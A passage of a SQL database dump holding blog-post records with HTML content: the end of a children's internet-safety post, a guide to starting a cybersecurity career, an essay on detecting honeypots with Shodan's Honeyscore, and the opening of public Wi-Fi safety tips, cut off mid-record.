citizens.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The digital landscape isn’t without its risks, but armed with the right strategies, you can help your children use the internet safely and confidently.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From leveraging parental control tools to fostering honest conversations, each step you take strengthens their online safety net. And remember, education is a two-way road—learning about the digital world together can be an excellent opportunity to bond with your kids while ensuring their well-being.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Do you have any tried-and-true tips for internet safety? Share your ideas in the comments below—we’d love to hear from you!</p>', '', NULL, NULL, 1, 'draft', '2024-02-21 03:26:03', '2026-01-12 21:41:44', 'CyberKids', 'Keep safe your kids from danger of internet', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(138, 'How to Get into the Cybersecurity World', 'how-to-get-into-the-cybersecurity-world', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is one of the fastest-growing and most sought-after industries today. With the rapid expansion of digital technologies, organizations of every size are striving to protect their systems and data from cyber threats. For those intrigued by this dynamic and rewarding field, the opportunity to carve out a meaningful and impactful career is greater than ever.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">But where do you begin? If the idea of defending against hackers and securing systems excites you, this guide will walk you through the essential steps needed to start and thrive in the world of cybersecurity.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Build a Strong Foundation in Computer Systems, Networks</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding the basics is crucial in any field, and cybersecurity is no different. To excel in the job, it’s pivotal to have a comprehensive understanding of how computer systems and networks operate.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how you can strengthen your foundation:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Take Courses</strong></b>: Enroll in introductory courses in computer science, network administration, and programming. Platforms like Coursera, Udemy, and Codeacademy offer relevant beginner to advanced-level content.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Certifications</strong></b>: Certifications in networking and programming, such as Cisco’s CCNA or foundational courses in Python, JavaScript, or C++, can give you the technical baseline for your career.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This knowledge fuels your confidence in understanding the structure of modern technologies and prepares you for analyzing vulnerabilities in cyber systems.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Obtain Industry-Recognized Certifications</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Certifications serve as an official recognition of your skills and understanding of cybersecurity concepts. They not only bolster your resume but also show potential employers that you’re committed to mastering your craft. Some of the most respected and widely recognized certifications include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">CompTIA Security+</strong></b> – A great starting point for beginners that covers core cybersecurity principles.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Certified Ethical Hacker (CEH)</strong></b> – Provides expertise in penetration testing and identifying vulnerabilities like a “white-hat” hacker.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Certified Information Systems Security Professional (CISSP)</strong></b> – Ideal for those looking to specialize in advanced security management.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These certifications open doors to more job opportunities and can often serve as prerequisites for various cybersecurity roles. Many can be completed online, making it easier to integrate education into your schedule.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Gain Hands-On, Practical Experience</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Theory and certifications set a great foundation, but practical experience truly prepares you for the challenges of a real-world cybersecurity career. Employers value tangible skills, so actively seek opportunities that allow you to practice what you’ve learned.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Some ways to gain hands-on experience include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Internships</strong></b> – Work for cybersecurity firms, tech companies, or even small businesses looking to strengthen their security infrastructure.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Capture the Flag (CTF) Events</strong></b> – Compete in cybersecurity challenges that simulate real-world attacks and problem-solving scenarios.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Open-Source Contributions</strong></b> – Collaborate on GitHub or open-source cybersecurity projects to expand your experience.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Personal Projects</strong></b> – Build a home lab to conduct your own penetration testing or explore vulnerability assessments.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The more hands-on exposure you have, the more confident and valuable you’ll be as a professional in the field.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 4: Network with Industry Professionals</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity industry thrives on collaboration and the exchange of knowledge. Networking presents a critical avenue for staying connected with industry trends and developing relationships that can spark opportunities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ways to build a professional network in cybersecurity:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Attend <b><strong class=\"font-bold\">industry events and conferences</strong></b>, such as Black Hat and DEF CON, to meet other professionals and learn about cutting-edge innovations.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Join <b><strong class=\"font-bold\">online forums and communities</strong></b> like Reddit (subreddits such as r/cybersecurity or r/netsec) or LinkedIn groups dedicated to cybersecurity discussions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Participate in <b><strong class=\"font-bold\">meetups or local workshops</strong></b>, where you can engage with others in your area who share the same career interests.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These steps help you develop mentorship connections, discover career opportunities, and continuously learn from your peers.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 5: Consider a Degree in Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Although not always required, earning a degree in cybersecurity, computer science, or information technology can open more doors for career advancement. A degree provides in-depth theoretical knowledge as well as hands-on practice, often through university labs or internships.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Degrees like these are especially valuable if you aspire to pursue roles in senior management or specialized areas, such as designing security systems for enterprises. If you’re aiming for a generalist’s path or self-teaching, however, a degree may not always be necessary depending on the employer\'s requirements.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 6: Stay Ahead with the Latest Trends and Technologies</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyber threats are dynamic, with attackers constantly devising new techniques and vulnerabilities to exploit. To stay effective as a cybersecurity professional, it’s essential to continuously update your knowledge of emerging trends, tools, and best practices.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how you can stay ahead:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Read Industry Publications</strong></b> – Subscribe to platforms like WIRED, Dark Reading, or CSO Online for timely updates on threats and cybersecurity technologies.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Continuing Education</strong></b> – Regularly enroll in new certification courses or advanced training on the latest developments in cybersecurity.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Podcasts and Webinars</strong></b> – Explore conversations about current threats and mitigations through professional discussions online.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Certifications Renewal</strong></b> – Keep your certifications current by participating in refresher or re-certification exams periodically.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Being proactive in your learning ensures that you remain a step ahead of evolving threats and competitive in the job market.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why a Career in Cybersecurity is Exciting</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The field of cybersecurity combines technical acumen with problem-solving creativity, offering an intellectually stimulating career path. Beyond the personal rewards, however, cybersecurity professionals play a vital role in protecting the individual, organizational, and even national economy. You’ll have the chance to influence how safe technology operates for billions of users.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you’re defending systems from attackers, securing personal data, or helping optimize processes for organizations, every day is a new challenge in this field.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Starting your cybersecurity career may seem intimidating at first, but with consistent effort and dedication, it is an achievable—and immensely rewarding—goal. Focus on building your technical capabilities, obtaining certifications, gaining practical experience, and remaining engaged with professionals in the field.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you\'re ready to explore the first step, it might be time to sign up for your first cybersecurity course or certification program. Equip yourself with the foundational skills and a forward-thinking mindset to tackle modern-day digital threats, and you’ll launch a career that’s as impactful as it is future-proof.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity isn’t just a career; it’s a commitment to creating a safer, better-connected world. Now is the time to make that commitment.</p>', '', NULL, NULL, 1, 'draft', '2024-02-20 03:27:09', '2026-01-12 21:41:44', 'Information Security', 'How to Get into the Cybersecurity World', '', NULL),
(139, 'The Dual Nature of Shodan.io: Friend or Foe?', 'the-dual-nature-of-shodan-io-friend-or-foe', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is a fascinating field with endless learning opportunities. Even after nearly two decades in IT, I\'m still amazed by how much there is to discover. Recently, I learned about an intriguing method to determine if a public IP address is a honeypot. This realization has sparked thought-provoking discussions about the dual nature of honeypots and their role in the ongoing battle between defenders and attackers in the cyber realm.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is a Honeypot?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A honeypot is a decoy system designed to lure cyber attackers. These setups mimic real systems, creating an environment where attackers believe they’ve found a legitimate target. By attracting and engaging attackers, honeypots provide an invaluable opportunity for defenders to monitor, analyze, and learn from malicious activities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Honeypots can be as simple as emulating a single service or as advanced as replicating an entire system. Their primary role is to serve as a trap, giving defenders the chance to observe hacking techniques, identify vulnerabilities, and refine their security strategies based on real-world insights.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Discovery Process: Checking for Honeypots</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The recent realization that tools like Shodan can identify public IP addresses associated with honeypots is particularly exciting. Shodan, often referred to as the \"Google for devices,\" is a powerful search engine that scans the internet for information about devices connected to public IP addresses. It provides data on exposed services, open ports, and other useful metrics.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><a href=\"https://honeyscore.shodan.io/\">Using Shodan to Detect Honeypots</a></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s a straightforward method to detect potential honeypots using Shodan:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><a href=\"https://shodan.io/\"><b><strong class=\"font-bold\">Access Shodan</strong></b></a></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Visit Shodan’s website and enter the public IP address you want to investigate.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Analyze the Results</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Review the output, looking for unusual open ports, unexpected services, or other irregularities that deviate from standard device behavior.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Identify Indicators</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If the analysis reveals anomalies or patterns inconsistent with typical system layouts, the IP address in question might be a honeypot.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Tools like Shodan’s Honeyscore (https://honeyscore.shodan.io/) can make this process even more streamlined by assigning scores based on the likelihood of an IP being a honeypot.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Unlocking the Potential of Honeypots for Blue-Team Defenders</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From the perspective of blue-team defenders (security professionals who focus on defense), honeypots offer several significant benefits:</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Insight into Attacks</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Honeypots allow defenders to observe real-world attacks in a controlled environment. By analyzing the captured data, defenders gain deep insights into emerging attack vectors and hacking techniques.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Improved Security Measures</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The information collected through honeypots helps defenders identify vulnerabilities within their systems. This empowers them to develop stronger defenses and close security gaps that attackers might exploit.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Early Detection</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Honeypots act as an early-warning system, alerting defenders to malicious activity before it escalates to attacks on critical assets. This proactive approach enhances overall cybersecurity readiness.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Risks and Challenges of Honeypots</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Despite their many advantages, the effective use of honeypots also presents challenges. The ability to detect honeypots using tools like Shodan introduces new risks:</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Exposure of Honeypots</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If hackers can identify a honeypot, they might avoid interacting with it altogether. This defeats the purpose of the honeypot, as it no longer serves as a useful decoy.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Manipulation of Defenders</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Worse still, skilled attackers might deliberately feed honeypots false or misleading data. By doing so, they could misguide defenders, redirecting their focus away from actual targets.</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Evasion Tactics</h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Knowledge of honeypots incentivizes attackers to develop sophisticated methods to bypass or neutralize these traps. This can make it difficult for defenders to achieve the level of insight they seek.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">A Double-Edged Sword</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The emergence of tools and techniques, such as Shodan\'s honeypot detection capabilities, touches on a broader question about the role of honeypots in cybersecurity. Are they more beneficial to defenders or to attackers?</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">On the defensive side, honeypots provide critical insights and a proactive defense mechanism. They empower defenders by offering insights into potential threats, which help strengthen defenses and mitigate risks to critical infrastructure.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">On the attacking side, knowledge of honeypots presents an opportunity to evade detection or mislead security teams. Skilled hackers who can identify honeypots effectively neutralize them as a defensive tool, diminishing their overall effectiveness.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Bigger Picture in Cybersecurity</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ability to detect honeypots highlights the delicate balance between defenders and attackers in the world of cybersecurity. It underscores the constant, evolving dynamic where both sides are continually exploring new tools and strategies.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For defenders, the challenge lies in deploying honeypots strategically and remaining one step ahead of attackers. Proper configuration and maintenance are critical to preventing detection and maximizing the potential of honeypots. Meanwhile, attackers continue to develop new techniques to identify and evade honeypots, creating an ongoing arms race in cybersecurity innovation.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The discovery of tools that can check if a public IP address is a honeypot underscores the complexity of the modern cybersecurity landscape. Honeypots remain a valuable tool for defenders, offering insights and bolstering defenses. However, their effectiveness hinges upon their ability to remain inconspicuous in the face of evolving detection methods.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding and leveraging resources like Shodan can tip the scales in either direction. For blue-team defenders, these tools offer unparalleled opportunities to learn and adapt. For attackers, they represent a chance to evade traps and refine their craft.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">As cybersecurity professionals, it\'s our responsibility to stay informed, adapt to new developments, and refine strategies to maintain a secure digital environment. Honeypots, for all their advantages and challenges, continue to be a critical tool in this ongoing battle.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Want to dig deeper into the dynamics of honeypots and detection tools like Shodan? Explore more insights on cutting-edge cybersecurity practices and stay ahead of potential threats. Stay secure and stay informed!</p>', '', NULL, NULL, 1, 'draft', '2024-02-16 03:50:03', '2026-01-12 21:41:44', 'OSINT Tool', 'The Dual Nature of Shodan.io: Friend or Foe?', '', NULL),
(140, 'How to Stay Secure while using Public WiFi', 'how-to-stay-secure-while-using-public-wifi', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Public Wi-Fi networks are everywhere—coffee shops, airports, libraries—offering convenient access to the internet on the go. But have you ever stopped to consider whether these networks are safe to use? Unfortunately, public Wi-Fi networks tend to be inherently less secure than private, encrypted connections. If you\'re not careful, you could be putting your sensitive data, passwords, or even entire devices at risk.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding the risks—and taking proper precautions—can dramatically reduce your vulnerabilities. Whether it\'s by using a VPN or simply avoiding unknown networks, these safety tips can help protect your data while you\'re connected to public Wi-Fi.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Public Wi-Fi Networks Are Risky</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Lack of Encryption</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Most public Wi-Fi networks are not encrypted, meaning data transmitted over these networks can be intercepted by attackers. Without encryption, any information you send, such as login details to your personal accounts, could be picked up by cybercriminals lurking on the network. This makes activities like online banking and accessing sensitive emails especially dangerous on public Wi-Fi.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Shared Networks</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the biggest problems with public Wi-Fi is that it\'s a shared resource. Everyone on the network is essentially using the same digital \"pipe,\" making it easier for attackers to target a large number of users at once. Maybe you\'ve heard about \"man-in-the-middle\" attacks. This is a technique where attackers intercept and even manipulate the communication between devices on the same network. Public Wi-Fi also serves as a breeding ground for malware distribution, as infected devices can quickly spread harmful software to others.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Lack of Maintenance</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unlike private networks, public Wi-Fi often lacks a trusted administrator. This means that vulnerabilities or existing security issues could go unnoticed and unpatched by operators, creating a prime opportunity for attackers. Even the most cautious Wi-Fi user is at risk if the network itself is poorly maintained.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Essential Tips to Stay Safe on Public Wi-Fi</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Fortunately, there are ways to protect yourself while still enjoying the convenience of public Wi-Fi. Here’s how you can minimize the risks and safeguard your data.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Avoid Sensitive Activities</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When you\'re using public Wi-Fi, it\'s best to steer clear of tasks that involve sensitive information. 